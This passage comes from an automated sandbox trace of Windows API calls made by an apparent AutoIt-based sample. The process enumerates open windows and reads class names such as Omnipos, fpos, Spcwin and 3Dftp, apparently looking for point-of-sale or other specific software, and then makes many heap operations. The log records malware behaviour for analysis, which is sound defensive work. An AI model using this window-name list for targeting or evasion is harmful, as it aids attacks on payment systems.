[0121.263] GetWindowTextW (in: hWnd=0x100a8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.263] GetClassNameW (in: hWnd=0x100a8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.263] GetWindowTextW (in: hWnd=0x100b4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.263] GetClassNameW (in: hWnd=0x100b4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.264] GetWindowTextW (in: hWnd=0x100be, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.264] GetClassNameW (in: hWnd=0x100be, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.264] GetWindowTextW (in: hWnd=0x100c2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.264] GetClassNameW (in: hWnd=0x100c2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.264] GetWindowTextW (in: hWnd=0x1008c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.264] GetClassNameW (in: hWnd=0x1008c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.264] GetWindowTextW (in: hWnd=0x10098, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.264] GetClassNameW (in: hWnd=0x10098, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.265] GetWindowTextW (in: hWnd=0x100bc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.265] GetClassNameW (in: hWnd=0x100bc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.265] GetWindowTextW (in: hWnd=0x10080, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.265] GetClassNameW (in: hWnd=0x10080, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Shell_TrayWnd") returned 13 [0121.265] GetWindowTextW (in: hWnd=0x20048, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Network Flyout") returned 14 [0121.265] GetClassNameW (in: hWnd=0x20048, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ATL:00007FFB0FD84120") returned 20 [0121.265] GetWindowTextW (in: hWnd=0x100d6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.266] GetClassNameW (in: hWnd=0x100d6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.266] GetWindowTextW (in: hWnd=0x100cc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.266] GetClassNameW (in: hWnd=0x100cc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0121.266] GetWindowTextW (in: hWnd=0x802d6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="AutoIt v3") returned 9 [0121.266] NtdllDefWindowProc_W (hWnd=0x802d6, Msg=0xd, wParam=0x400, lParam=0x7deed0) returned 0x9 [0121.266] GetClassNameW (in: hWnd=0x802d6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="AutoIt v3") returned 9 [0121.266] GetWindowTextW (in: hWnd=0x4035c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.266] GetClassNameW (in: hWnd=0x4035c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0121.266] GetWindowTextW (in: hWnd=0x20286, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0121.267] GetClassNameW (in: hWnd=0x20286, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="TabThumbnailWindow") returned 18 [0121.267] GetWindowTextW (in: hWnd=0x202d8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.267] GetClassNameW (in: hWnd=0x202d8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="VSyncHelper-0062D168-9f59f66") returned 28 [0121.267] GetWindowTextW (in: hWnd=0x20364, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.267] GetClassNameW (in: hWnd=0x20364, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Alternate Owner") returned 15 [0121.267] GetWindowTextW (in: hWnd=0x10336, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Omnipos") returned 7 [0121.267] GetClassNameW (in: hWnd=0x10336, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="omniposclass") returned 12 [0121.267] GetWindowTextW (in: hWnd=0x2021e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Nor Development Rather") returned 22 [0121.268] GetClassNameW (in: hWnd=0x2021e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="nordevelopmentRatherclass") returned 25 [0121.268] GetWindowTextW (in: hWnd=0x1036a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Force Which Baby") returned 16 [0121.268] GetClassNameW (in: hWnd=0x1036a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="force_which_Baby_cls") returned 20 [0121.268] GetWindowTextW (in: hWnd=0x10366, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Drive Law") returned 9 [0121.268] GetClassNameW (in: hWnd=0x10366, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DriveLawwindow") returned 14 [0121.268] GetWindowTextW (in: hWnd=0x10306, lpString=0x7deed0, nMaxCount=1024 | out: lpString="3Dftp") returned 5 [0121.268] GetClassNameW (in: hWnd=0x10306, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="3dftp") returned 5 [0121.269] GetWindowTextW (in: hWnd=0x10344, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Utg2") returned 4 [0121.269] GetClassNameW (in: hWnd=0x10344, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="utg2_cls") returned 8 [0121.269] GetWindowTextW (in: hWnd=0x10340, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Spgagentservice") returned 15 [0121.269] GetClassNameW (in: hWnd=0x10340, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="spgagentservicewindow") returned 21 [0121.269] GetWindowTextW (in: hWnd=0x102e6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Barca") returned 5 [0121.269] GetClassNameW (in: hWnd=0x102e6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="barca_class") returned 11 [0121.269] GetWindowTextW (in: hWnd=0x1038e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.269] GetClassNameW (in: hWnd=0x1038e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.270] GetWindowTextW (in: hWnd=0x10342, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Spcwin") returned 6 [0121.270] GetClassNameW (in: hWnd=0x10342, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="spcwin_wnd") returned 10 [0121.270] GetWindowTextW (in: hWnd=0x10338, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Fpos") returned 4 [0121.270] GetClassNameW (in: hWnd=0x10338, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="fpos") returned 4 [0121.285] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b18 | out: hHeap=0x12c0000) returned 1 [0121.286] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a78 [0121.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a78 | out: hHeap=0x12c0000) returned 1 [0121.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.286] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.286] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0121.287] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0121.287] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.287] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.287] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0121.287] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.287] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0121.287] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.287] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.287] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0121.287] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ad8 [0121.287] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ad8 | out: hHeap=0x12c0000) returned 1 [0121.287] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.287] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.287] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0121.287] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.287] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0121.288] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.288] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.288] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.288] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.288] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.288] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.288] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.288] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0121.288] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.288] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0121.288] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.288] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0121.288] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.288] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491918 [0121.289] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491918 | out: hHeap=0x12c0000) returned 1 [0121.289] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.289] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.289] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a18 [0121.289] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.289] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a18 | out: hHeap=0x12c0000) returned 1 [0121.289] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.289] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.289] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2a8 [0121.289] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0121.289] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0121.289] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.289] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd598 [0121.289] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4c0 [0121.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0121.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0121.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2a8 | out: hHeap=0x12c0000) returned 1 [0121.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0121.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0121.290] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0121.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0121.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c98 [0121.290] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c98 | out: hHeap=0x12c0000) returned 1 [0121.290] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491978 [0121.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491978 | out: hHeap=0x12c0000) returned 1 [0121.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.291] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.291] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0121.291] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.291] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.291] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff460 [0121.291] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4c0 [0121.291] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.291] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0121.291] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.291] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a38 [0121.291] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff190 [0121.291] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0121.291] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0121.291] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0121.292] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.292] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1c210) returned 0x14f83e0 [0121.303] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.303] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0121.303] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14f83e0 | out: hHeap=0x12c0000) returned 1 [0121.303] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.303] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0121.303] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff190 | out: hHeap=0x12c0000) returned 1 [0121.303] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.303] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918d8 [0121.303] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0121.303] GetLastError () returned 0x0 [0121.303] SetLastError (dwErrCode=0x0) [0121.303] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.303] GetLastError () returned 0x0 [0121.304] SetLastError (dwErrCode=0x0) [0121.304] GetLastError () returned 0x0 [0121.304] SetLastError (dwErrCode=0x0) [0121.304] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0121.304] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0121.304] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0121.304] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0121.304] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff398 [0121.304] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0121.304] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918d8 | out: hHeap=0x12c0000) returned 1 [0121.304] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0121.305] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.305] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0121.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0121.305] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0121.305] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a38 | out: hHeap=0x12c0000) returned 1 [0121.305] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.305] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1491818 [0121.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0121.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0a0 [0121.305] CharLowerBuffW (in: lpsz="byte[116216]", cchLength=0xc | out: lpsz="byte[116216]") returned 0xc [0121.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x14be168 [0121.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd598 [0121.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0121.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0121.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0121.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0121.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0121.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0121.306] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0121.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0121.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0121.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0121.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0121.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.306] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0121.306] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1c5f8) returned 0x14f83e0 [0121.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0a0 | out: hHeap=0x12c0000) returned 1 [0121.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff398 | out: hHeap=0x12c0000) returned 1 [0121.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0121.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0121.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff460 | out: hHeap=0x12c0000) returned 1 [0121.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0121.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14be1f8 | out: hHeap=0x12c0000) returned 1 [0121.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ad8 | out: hHeap=0x12c0000) returned 1 [0121.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918b8 | out: hHeap=0x12c0000) returned 1 [0121.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1491b18 [0121.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x14bde68 [0121.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0121.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0121.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0121.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14be168 | out: hHeap=0x12c0000) returned 1 [0121.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491818 | out: hHeap=0x12c0000) returned 1 [0121.308] PeekMessageW (in: lpMsg=0x7df8b4, 